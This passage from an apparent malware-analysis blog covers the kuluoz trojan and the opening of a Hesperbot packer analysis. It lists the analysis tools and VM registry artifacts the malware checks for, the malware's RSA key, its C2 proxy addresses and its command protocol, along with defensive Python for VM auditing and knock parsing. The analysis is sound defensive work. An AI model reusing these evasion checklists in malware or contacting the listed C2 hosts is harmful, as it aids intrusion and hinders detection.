<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<i><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">FOR
WINDOW NAMES:<o:p></o:p></span></span></i></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">wireshark.exe<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Tfrmrpcap<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">iptools.exe<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Iris - Version 5.59<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">ProcessLasso_Notification_Class<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">TSystemExplorerTrayForm.UnicodeClass<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">PROCMON_WINDOW_CLASS<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">PROCEXPL<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">WdcWindow<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">ProcessHacker<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">99929D61-1338-48B1-9433-D42A1D94F0D2-x64<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">99929D61-1338-48B1-9433-D42A1D94F0D2-x32<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">99929D61-1338-48B1-9433-D42A1D94F0D2<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Dumper<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Dumper64<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">APISpy32Class<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">VMwareDragDetWndClass<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">VMwareSwitchUserControlClass<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">vmtoolsd.exe<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">prl_cc.exe<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">prl_tools.exe<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">SharedIntApp.exe<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">VBoxTray.exe<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">VBoxService.exe<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">vmusrvc.exe<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">vmsrvc.exe<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<i><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">FOR
REGISTRY:<o:p></o:p></span></span></i></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Disk\Enum 0=VMware<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Disk\Enum 0=PTLTD<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Disk\Enum 0=Virtual<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\BIOS SystemProductName=VMware<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\BIOS SystemProductName=PTLTD<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\BIOS SystemManufacturer=VMware<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\BIOS SystemManufacturer=PTLTD<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\PCI\VEN_15AD&DEV_0774&SUBSYS_040515AD&REV_00<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\PCI\VEN_15AD&DEV_0774&SUBSYS_074015AD&REV_00<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\PCI\VEN_80EE&DEV_CAFE&SUBSYS_00000000&REV_00<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\PTLTD__<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Disk\Enum 0=Virtual<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Disk\Enum 0=PRLS<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\BIOS SystemProductName=Virtual<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\BIOS SystemProductName=PRLS<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\BIOS SystemManufacturer=Virtual<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\BIOS SystemManufacturer=PRLS<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Disk\Enum 0=VBox<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\BIOS SystemProductName=VBox<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\BIOS SystemManufacturer=VBox<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\BIOS SystemProductName=AMIBI<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\BIOS SystemManufacturer=AMIBI<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\PCI\VEN_5333&DEV_8811&SUBSYS_00000000&REV_00<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\PCI\VEN_80EE&DEV_BEEF&SUBSYS_00000000&REV_00<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\PCI\VEN_80EE&DEV_CAFE&SUBSYS_00000000&REV_00<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\AMIBI<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
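<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">The registry checks above can be turned into an audit of an analysis VM: the Python below (an added example, not the malware's code or the author's) evaluates the listed keys and values against a registry snapshot and reports which artifacts kuluoz would find. The two snapshots are constructed, the live collector is Windows-only, and the case-insensitive substring match is an assumption about how the malware compares the strings.</span></span></div>

```python
# Audit a registry snapshot for the VM/sandbox artifacts kuluoz checks.
# Added example, not the malware's code; snapshot format and substring
# matching are assumptions.
import sys
from typing import Dict, List, Tuple

RegistrySnapshot = Dict[str, Dict[str, str]]   # subkey -> {value name: data}

DISK_ENUM = r"SYSTEM\CurrentControlSet\services\Disk\Enum"
BIOS = r"HARDWARE\DESCRIPTION\System\BIOS"
PCI = r"SYSTEM\CurrentControlSet\Enum\PCI"

# (subkey, value name, marker string) for every "Key Value=Data" entry listed above.
VALUE_CHECKS: List[Tuple[str, str, str]] = [
    (DISK_ENUM, "0", m) for m in ("VMware", "PTLTD", "Virtual", "PRLS", "VBox")
] + [
    (BIOS, v, m) for v in ("SystemProductName", "SystemManufacturer")
    for m in ("VMware", "PTLTD", "Virtual", "PRLS", "VBox", "AMIBI")
]

# Subkeys whose mere existence is the indicator (PCI device IDs and ACPI tables).
KEY_CHECKS: List[str] = [
    PCI + r"\VEN_15AD&DEV_0774&SUBSYS_040515AD&REV_00",
    PCI + r"\VEN_15AD&DEV_0774&SUBSYS_074015AD&REV_00",
    PCI + r"\VEN_80EE&DEV_CAFE&SUBSYS_00000000&REV_00",
    PCI + r"\VEN_5333&DEV_8811&SUBSYS_00000000&REV_00",
    PCI + r"\VEN_80EE&DEV_BEEF&SUBSYS_00000000&REV_00",
    r"HARDWARE\ACPI\DSDT\PTLTD__",
    r"HARDWARE\ACPI\DSDT\VBOX__",
    r"HARDWARE\ACPI\DSDT\AMIBI",
]


def evaluate(snapshot: RegistrySnapshot) -> List[str]:
    """Return one line per artifact found; an empty list means a clean snapshot.
    Case-insensitive substring matching is an assumption about the malware."""
    hits = []
    for subkey, name, marker in VALUE_CHECKS:
        data = snapshot.get(subkey, {}).get(name)
        if data is not None and marker.lower() in data.lower():
            hits.append(f"{subkey}\\{name} contains {marker!r}: {data!r}")
    for subkey in KEY_CHECKS:
        if subkey in snapshot:
            hits.append(f"key exists: {subkey}")
    return hits


def snapshot_from_live_registry() -> RegistrySnapshot:
    """Collect only the keys the checks need from the local machine (Windows only)."""
    if sys.platform != "win32":
        raise RuntimeError("live collection needs Windows; call evaluate() on a snapshot")
    import winreg
    snap: RegistrySnapshot = {}
    wanted = {DISK_ENUM: ["0"], BIOS: ["SystemProductName", "SystemManufacturer"]}
    for subkey, names in wanted.items():
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, subkey) as key:
                for name in names:
                    try:
                        snap.setdefault(subkey, {})[name] = str(winreg.QueryValueEx(key, name)[0])
                    except FileNotFoundError:
                        pass            # value absent: nothing to match
        except FileNotFoundError:
            pass                        # key absent: nothing to match
    for subkey in KEY_CHECKS:
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, subkey):
                snap[subkey] = {}
        except FileNotFoundError:
            pass
    return snap


# Constructed snapshots: a stock VirtualBox guest and a guest with the artifacts removed.
VBOX_GUEST: RegistrySnapshot = {
    DISK_ENUM: {"0": r"IDE\DiskVBOX_HARDDISK___________________1.0_____\5&1234abcd&0&0.0.0"},
    BIOS: {"SystemProductName": "VirtualBox", "SystemManufacturer": "innotek GmbH"},
    PCI + r"\VEN_80EE&DEV_CAFE&SUBSYS_00000000&REV_00": {},
    r"HARDWARE\ACPI\DSDT\VBOX__": {},
}
HARDENED_GUEST: RegistrySnapshot = {
    DISK_ENUM: {"0": r"IDE\DiskST1000DM003-1ER162______________CC45____\4&abcd1234&0&0.0.0"},
    BIOS: {"SystemProductName": "Workstation", "SystemManufacturer": "Example Vendor"},
}

if __name__ == "__main__":
    for label, snap in (("stock VirtualBox guest", VBOX_GUEST), ("hardened guest", HARDENED_GUEST)):
        print(label + ":", evaluate(snap) or "no listed artifacts")
```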
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">It uses the following RSA public key
(found embedded in its body, in PEM format) to encrypt data before sending it over
its connection to the C2 server.<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">-----BEGIN PUBLIC KEY-----<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDCUAUdLJ1rmxx+bAndp+Cz6+5I<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Kmgap2hn2df/UiVglAvvg2US9qbk65ixqw3dGN/9O9B30q5RD+xtZ6gl4ChBquqw<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">jwxzGTVqJeexn5RHjtFR9lmJMYIwzoc/kMG8e6C/GaS2FCgY8oBpcESVyT2woV7U<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">00SNFZ88nyVv33z9+wIDAQAB<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">-----END PUBLIC KEY----- <o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">After sending the encrypted data to a C2
server, it attempts to obtain a current list of IP addresses and ports of other
possible C2 servers, so that it can keep communicating with the real C2
server (the "mother"); this list arrives together with the commands issued by the C2.</span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQnhYx6tmijc4pVgH_LPwaWh3SjXlkdvKS2PTKJviQ25QFXYbBXi6YQ0JfeBkfT5ys6BERMpwE1IzW6TkwKRO151SpVvxlRSCf5hq5C58qwr8P95w7rKeYoiRKy8kZLFoStDqYgpio/s1600/communicating+with+a+c2+server.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQnhYx6tmijc4pVgH_LPwaWh3SjXlkdvKS2PTKJviQ25QFXYbBXi6YQ0JfeBkfT5ys6BERMpwE1IzW6TkwKRO151SpVvxlRSCf5hq5C58qwr8P95w7rKeYoiRKy8kZLFoStDqYgpio/s1600/communicating+with+a+c2+server.png" height="135" width="320" /></span></a></div>
<div align="center" class="MsoNormal" style="text-align: center;">
<i><span lang="EN-US" style="font-weight: normal; line-height: 115%;"><span style="font-family: inherit; font-size: small;">Communicating with a C2 Server<o:p></o:p></span></span></i></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;"><br /></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">A sample of a response header is seen
below.</span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhi6zF05ZKoUHVJop1gdrGzMVxD-mZc7ifM-on6L7xizKP8S0-I5rvfzDxAX8jaiujgNezbRgH86dAjISwfwZ8CzG2xZcDTIXbG6VddipNdwAhBQ-enjXzashAD1BtLdlu7i5OyBFBR/s1600/Response+header+from+c2+server.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhi6zF05ZKoUHVJop1gdrGzMVxD-mZc7ifM-on6L7xizKP8S0-I5rvfzDxAX8jaiujgNezbRgH86dAjISwfwZ8CzG2xZcDTIXbG6VddipNdwAhBQ-enjXzashAD1BtLdlu7i5OyBFBR/s1600/Response+header+from+c2+server.png" height="224" width="320" /></span></a></div>
<div align="center" class="MsoNormal" style="text-align: center;">
<i><span lang="EN-US" style="font-weight: normal; line-height: 115%;"><span style="font-family: inherit; font-size: small;">Response Header from C2 Server<o:p></o:p></span></span></i></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">As seen in the image, the server it
connects to identifies itself as nginx, which here acts only as a proxy in front of the real C2.<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">The list of possible proxy servers that I
have acquired is below:<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">1.234.53.27:443<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">213.21.158.141:443<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">27.54.87.235:443<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Commands are also sent using the
following knock data format:<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<i><span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;"><knock><id>67454D7C26333FBA5B5169311188D3A7</id><task
type="idl" /></knock><o:p></o:p></span></span></i></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Where:<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">task type = the command sent by C2
server<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">The possible commands are:<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">idl = Long sleep<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">rdl = download and run kuluoz module<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">run = download .exe, install and run<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">rem = remove kuluoz module from the
system<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">red = update registry keys<o:p></o:p></span></span></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-family: inherit;"><span style="font-weight: normal;"><span style="font-size: small;">upd = update kuluoz.exe</span></span><o:p></o:p></span></div>
<div class="MsoNoSpacing">
<span style="font-family: inherit;"><br /></span></div>
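<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Both knock forms described above, the bot's check-in and the C2's task reply, can be parsed with the Python below; it is an added example, not code from the analysis or the malware, and gives a one-line triage summary per message. The check-in sample is constructed, the task sample reuses the format shown above, and reading a nonzero src or transport as "true" is an assumption.</span></span></div>

```python
# Parser for kuluoz "knock" messages: bot -> C2 check-in and C2 -> bot task.
# Added example, not from the analysis or the malware; samples are constructed.
from dataclasses import dataclass
from typing import Optional
import xml.etree.ElementTree as ET

# Task names and meanings as listed in the analysis above.
KULUOZ_TASKS = {
    "idl": "long sleep",
    "rdl": "download and run kuluoz module",
    "run": "download .exe, install and run",
    "rem": "remove kuluoz module from the system",
    "red": "update registry keys",
    "upd": "update kuluoz.exe",
}

CHECKIN_FIELDS = ("id", "group", "src", "transport", "time", "version", "status", "debug")
INT_FIELDS = ("src", "transport", "time", "version", "status")   # %d in the format string


@dataclass
class Checkin:
    """Fields of a bot -> C2 knock, in wire order."""
    id: str
    group: str
    src: int          # analysis tools / sandbox strings found
    transport: int    # running from a removable drive
    time: int
    version: int
    status: int       # status of the last command
    debug: str        # OS version and type


@dataclass
class Task:
    """A C2 -> bot knock carrying one task."""
    id: str
    task_type: str
    meaning: Optional[str]   # None when the type is not in the known list


def parse_knock(xml_text: str):
    """Return a Checkin or a Task; raise ValueError for anything else."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        raise ValueError(f"not well-formed XML: {exc}") from exc
    if root.tag != "knock":
        raise ValueError(f"unexpected top element <{root.tag}>")
    bot_id = root.findtext("id")
    if bot_id is None:
        raise ValueError("knock without <id>")
    task = root.find("task")
    if task is not None:
        ttype = task.get("type")
        if not ttype:
            raise ValueError("<task> without type attribute")
        return Task(id=bot_id, task_type=ttype, meaning=KULUOZ_TASKS.get(ttype))
    values = {}
    for name in CHECKIN_FIELDS:
        text = root.findtext(name)
        if text is None:
            raise ValueError(f"check-in knock missing <{name}>")
        if name in INT_FIELDS:
            try:
                values[name] = int(text)
            except ValueError:
                raise ValueError(f"<{name}> is not an integer: {text!r}") from None
        else:
            values[name] = text
    return Checkin(**values)


def summarize(knock) -> str:
    """One-line triage summary. Treating nonzero src/transport as 'true' is an assumption."""
    if isinstance(knock, Task):
        return f"task for {knock.id}: {knock.task_type} ({knock.meaning or 'UNKNOWN task type'})"
    flags = []
    if knock.src:
        flags.append("analysis tools reported")
    if knock.transport:
        flags.append("running from removable drive")
    return (f"check-in from {knock.id} group={knock.group} v{knock.version} "
            f"status={knock.status} debug={knock.debug!r}"
            + (" [" + ", ".join(flags) + "]" if flags else ""))


# Constructed samples; the id in SAMPLE_TASK is the one from the analysis above.
SAMPLE_CHECKIN = ("<knock><id>0000000000000000000000000000000000000000</id>"
                  "<group>constructed</group><src>1</src><transport>0</transport>"
                  "<time>1380000000</time><version>3</version><status>0</status>"
                  "<debug>Windows 7 SP1 x86</debug></knock>")
SAMPLE_TASK = '<knock><id>67454D7C26333FBA5B5169311188D3A7</id><task type="idl" /></knock>'

if __name__ == "__main__":
    for msg in (SAMPLE_CHECKIN, SAMPLE_TASK):
        print(summarize(parse_knock(msg)))
```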
</h2>
Author: Anonymous (http://www.blogger.com/profile/10653752703445056399)<br />
<br />
Post published 2013-12-26T21:18:00-08:00 (updated 2013-12-26T21:18:02-08:00)<br />
<br />
<h2>
<b>A Hesperbot Core Analysis</b></h2>
Like most malware families, Hesperbot may arrive in a spam email. Once executed, it attempts to download its malicious modules from command-and-control (C&C) servers and to monitor the activities of the infected computer. These “monitoring activities” range from logging keystrokes and recording the screen to hijacking the web browser, and more.<br />
<br />
While reverse engineering this trojan, I decided to divide it into three layers for easier understanding. These three layers are The Packer, The Injector and The Core.<br />
<br />
<h3>
Three Layers of Hesperbot:</h3>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiYa-S2F9w2z7r_i7wl3_w5jB9m4bFpbTnAEwQB591icDBshtvRU4wwyjdlyX_MsVY7YI4VZ197tlq3NVBhd6hN79ASZWXDLVOuPG2ezSNOKVY7dUww492d6K04WkO-IUO7ivjtmSZ/s1600/overview.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiYa-S2F9w2z7r_i7wl3_w5jB9m4bFpbTnAEwQB591icDBshtvRU4wwyjdlyX_MsVY7YI4VZ197tlq3NVBhd6hN79ASZWXDLVOuPG2ezSNOKVY7dUww492d6K04WkO-IUO7ivjtmSZ/s320/overview.png" /></a><br />
<br />
<h3>
The Packer</h3>
The packer walks the Thread Information Block (TIB) to retrieve the base address of NTDLL.DLL. That base address is then used to find the virtual addresses of the APIs it needs: it runs each exported name through its own hashing algorithm and compares the result against a hardcoded hash.<br />
<br />
This Trojan uses the following hashes of APIs to operate:<br />
<br />
For NTDLL.DLL:<br />
<br />
<ul>
<li>0x952A9E4: ZwAllocateVirtualMemory</li>
<li>0xCFF13015: LdrProcessRelocationBlock</li>
</ul>
<br />
It uses ZwAllocateVirtualMemory to allocate memory, decrypts 0x24176 bytes of data starting at virtual address 0x00404438 into it, and then transfers execution to the decrypted data in memory.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijzSxdy4VMit56Xvt20KfoT5R0FTFAnUzaSJd9n2wfACHDtvTUS8Iv4LT-Idzc_Q8niTakY_ozQnu9BKygghVn19rUWW7UBkP-F9dilvgl4GELij792I3gr1BulI-hYrbfDkwrPdKB/s1600/001DecryptToHighMem.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijzSxdy4VMit56Xvt20KfoT5R0FTFAnUzaSJd9n2wfACHDtvTUS8Iv4LT-Idzc_Q8niTakY_ozQnu9BKygghVn19rUWW7UBkP-F9dilvgl4GELij792I3gr1BulI-hYrbfDkwrPdKB/s320/001DecryptToHighMem.png" /></a><br />
<br />
Again it traverses TIB, but this time to get the base address of KERNEL32.DLL.<br />
<br />
It then resolves the following hashes and saves the resulting addresses for later use.<br />
<br />
For KERNEL32.DLL:<br />
<br />
<ul>
<li>0x3A35705F: VirtualFree</li>
<li>0x697A6AFE: VirtualAlloc</li>
<li>0xA9DE6F5A: VirtualProtect</li>
<li>0xC8AC8026: LoadLibraryA</li>
<li>0x1FC0EAEE: GetProcAddress</li>
</ul>
<br />
